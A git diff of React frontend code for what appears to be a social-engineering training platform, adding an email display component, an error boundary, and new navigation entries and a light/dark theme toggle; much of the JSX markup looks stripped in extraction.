/dev/null +++ b/frontend/src/components/EmailRenderer.js @@ -0,0 +1,69 @@ +import React from 'react'; +import { Star, Reply, Forward, Trash2, MoreHorizontal, Paperclip } from 'lucide-react'; + +export default function EmailRenderer({ email }) { + const { from, to, subject, body, date, attachments, cc } = email || {}; + + return ( +
+ {/* Email Header Bar */} +
+
+ + + +
+ +
+ + {/* Subject */} +
+

{subject || 'No Subject'}

+
+ + {/* Sender Info */} +
+
+
+ {(from || 'U').charAt(0).toUpperCase()} +
+
+
+ {from || 'Unknown Sender'} +
+

+ to {to || 'me'} + {cc && , cc: {cc}} +

+
+
+
+ {date || new Date().toLocaleString()} + +
+
+ + {/* Body */} +
+
+ {body || 'No content'} +
+
+ + {/* Attachments */} + {attachments && attachments.length > 0 && ( +
+
+ {attachments.map((att, idx) => ( +
+ + {att.name || `attachment_${idx + 1}`} + {att.size || ''} +
+ ))} +
+
+ )} +
+ ); +} diff --git a/frontend/src/components/ErrorBoundary.js b/frontend/src/components/ErrorBoundary.js new file mode 100644 index 0000000..713062c --- /dev/null +++ b/frontend/src/components/ErrorBoundary.js @@ -0,0 +1,48 @@ +import React from 'react'; + +class ErrorBoundary extends React.Component { + constructor(props) { + super(props); + this.state = { hasError: false, error: null }; + } + + static getDerivedStateFromError(error) { + return { hasError: true, error }; + } + + componentDidCatch(error, errorInfo) { + console.error('ErrorBoundary caught:', error, errorInfo); + } + + render() { + if (this.state.hasError) { + return ( +
+
+
!
+

SYSTEM ERROR

+

+ Something went wrong. The application encountered an unexpected error. +

+
+              {this.state.error?.message || 'Unknown error'}
+            
+ +
+
+ ); + } + + return this.props.children; + } +} + +export default ErrorBoundary; diff --git a/frontend/src/components/Layout.js b/frontend/src/components/Layout.js index fe873bf..26fb79e 100644 --- a/frontend/src/components/Layout.js +++ b/frontend/src/components/Layout.js @@ -1,21 +1,30 @@ -import React from 'react'; +import React, { useState } from 'react'; import { Link, useLocation } from 'react-router-dom'; import { useTranslation } from 'react-i18next'; import { Button } from './ui/button'; -import { Terminal, LayoutDashboard, FileCode, ListChecks, Activity, Settings, LogOut, BookOpen } from 'lucide-react'; +import NotificationBell from './NotificationBell'; +import { + Terminal, LayoutDashboard, FileCode, ListChecks, Activity, Settings, LogOut, BookOpen, + Trophy, BarChart3, Flag, Pencil, Zap, Sun, Moon, User +} from 'lucide-react'; export default function Layout({ children, onLogout }) { const { t } = useTranslation(); const location = useLocation(); + const [theme, setTheme] = useState(localStorage.getItem('soceng_theme') || 'dark'); const navigation = [ { name: t('nav.dashboard'), path: '/', icon: LayoutDashboard }, { name: t('nav.scenarios'), path: '/scenarios', icon: FileCode }, { name: t('nav.quizzes'), path: '/quizzes', icon: ListChecks }, - { name: t('nav.ai_challenge'), path: '/ai-challenge', icon: Activity }, + { name: t('nav.ai_challenge'), path: '/ai-challenge', icon: Zap }, + { name: 'Campaigns', path: '/campaigns', icon: Flag }, { name: t('nav.history'), path: '/simulations', icon: Activity }, + { name: 'Leaderboard', path: '/leaderboard', icon: Trophy }, + { name: 'Analytics', path: '/analytics', icon: BarChart3 }, + { name: 'Scenario Builder', path: '/scenario-builder', icon: Pencil }, { name: t('nav.glossary', 'Glossary'), path: '/glossary', icon: BookOpen }, - { name: t('nav.settings'), path: '/settings', icon: Settings } + { name: t('nav.settings'), path: '/settings', icon: Settings }, ]; const handleLogout = () => { @@ -24,6 +33,13 @@ export default function Layout({ children, onLogout }) { onLogout(); }; + const toggleTheme = () => { + const newTheme = theme === 'dark' ? 'light' : 'dark'; + setTheme(newTheme); + localStorage.setItem('soceng_theme', newTheme); + document.documentElement.classList.toggle('light', newTheme === 'light'); + }; + return (
{/* Global Scanlines Overlay */} @@ -49,7 +65,7 @@ export default function Layout({ children, onLogout }) {
{/* Navigation */} -